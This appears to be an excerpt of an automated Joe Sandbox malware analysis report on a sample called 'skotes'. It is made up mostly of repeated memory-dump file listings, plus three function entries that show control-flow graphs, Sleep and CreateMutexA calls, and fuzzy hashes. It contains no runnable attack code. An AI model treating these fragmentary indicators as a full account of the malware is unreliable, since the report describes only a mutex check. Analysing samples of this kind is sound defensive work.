                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: da3bf461caf1388d1a66a96bcd9ee2f246066553c2b5b987756a87cf6016c8c7
                                                                                                                                                                    • Instruction ID: 3bb485989e987e5d9bf4b7589a530884e58d87bd7c0a9dcf07f523da97056df5
                                                                                                                                                                    • Opcode Fuzzy Hash: da3bf461caf1388d1a66a96bcd9ee2f246066553c2b5b987756a87cf6016c8c7
                                                                                                                                                                    • Instruction Fuzzy Hash: 1A3126317111009BEB08ABB8DC897EDB763EB89310F28865DE018DB3D5C73589C18762
                                                                                                                                                                    Function 0061A079 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 56 61a079-61a099 60 61a0c7-61a0e3 56->60 61 61a09b-61a0a7 56->61 64 61a111-61a130 60->64 65 61a0e5-61a0f1 60->65 62 61a0a9-61a0b7 61->62 63 61a0bd-61a0c4 call 62d663 61->63 62->63 66 61a930-61a994 call 646c6a Sleep CreateMutexA 62->66 63->60 70 61a132-61a13e 64->70 71 61a15e-61a916 call 6280c0 64->71 68 61a0f3-61a101 65->68 69 61a107-61a10e call 62d663 65->69 86 61a9a7-61a9a8 66->86 87 61a996-61a998 66->87 68->66 68->69 69->64 76 61a140-61a14e 70->76 77 61a154-61a15b call 62d663 70->77 76->66 76->77 77->71 87->86 88 61a99a-61a9a5 87->88 88->86
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 6e69a56428bbfeb4623180276eacef70c0455e6c6bc3a1bb54346f1443127f0e
                                                                                                                                                                    • Instruction ID: 00ba1fc55c305f709cb1401ac39e062665931936c1d2cfaec7915f8318c7912c
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e69a56428bbfeb4623180276eacef70c0455e6c6bc3a1bb54346f1443127f0e
                                                                                                                                                                    • Instruction Fuzzy Hash: E0312831B121409BEB08DBB8DD897EDB763DF85310F28865DE018973D5C77599C08766
                                                                                                                                                                    Function 0061A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 90 61a1ae-61a1ce 94 61a1d0-61a1dc 90->94 95 61a1fc-61a218 90->95 96 61a1f2-61a1f9 call 62d663 94->96 97 61a1de-61a1ec 94->97 98 61a246-61a265 95->98 99 61a21a-61a226 95->99 96->95 97->96 102 61a935 97->102 100 61a293-61a916 call 6280c0 98->100 101 61a267-61a273 98->101 104 61a228-61a236 99->104 105 61a23c-61a243 call 62d663 99->105 107 61a275-61a283 101->107 108 61a289-61a290 call 62d663 101->108 110 61a953-61a994 Sleep CreateMutexA 102->110 111 61a935 call 646c6a 102->111 104->102 104->105 105->98 107->102 107->108 108->100 120 61a9a7-61a9a8 110->120 121 61a996-61a998 110->121 111->110 121->120 122 61a99a-61a9a5 121->122 122->120
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 78855bdcd68de870490af14873539082b7b883ecbeaac1e74c20f61e83faa1c6
                                                                                                                                                                    • Instruction ID: e5c2392c98c617e40e207916b6c30bd47e4141a0e28f9c321656528af7a29214
                                                                                                                                                                    • Opcode Fuzzy Hash: 78855bdcd68de870490af14873539082b7b883ecbeaac1e74c20f61e83faa1c6
                                                                                                                                                                    • Instruction Fuzzy Hash: FE311831B121409BEB08DBB8DC897EDB763EF86310F28465DE058973E5D7758AC08766
                                                                                                                                                                    Function 0061A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 124 61a418-61a438 128 61a466-61a482 124->128 129 61a43a-61a446 124->129 132 61a4b0-61a4cf 128->132 133 61a484-61a490 128->133 130 61a448-61a456 129->130 131 61a45c-61a463 call 62d663 129->131 130->131 134 61a93f-61a949 call 646c6a * 2 130->134 131->128 138 61a4d1-61a4dd 132->138 139 61a4fd-61a916 call 6280c0 132->139 136 61a492-61a4a0 133->136 137 61a4a6-61a4ad call 62d663 133->137 155 61a94e 134->155 156 61a949 call 646c6a 134->156 136->134 136->137 137->132 144 61a4f3-61a4fa call 62d663 138->144 145 61a4df-61a4ed 138->145 144->139 145->134 145->144 157 61a953-61a994 Sleep CreateMutexA 155->157 158 61a94e call 646c6a 155->158 156->155 160 61a9a7-61a9a8 157->160 161 61a996-61a998 157->161 158->157 161->160 162 61a99a-61a9a5 161->162 162->160
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
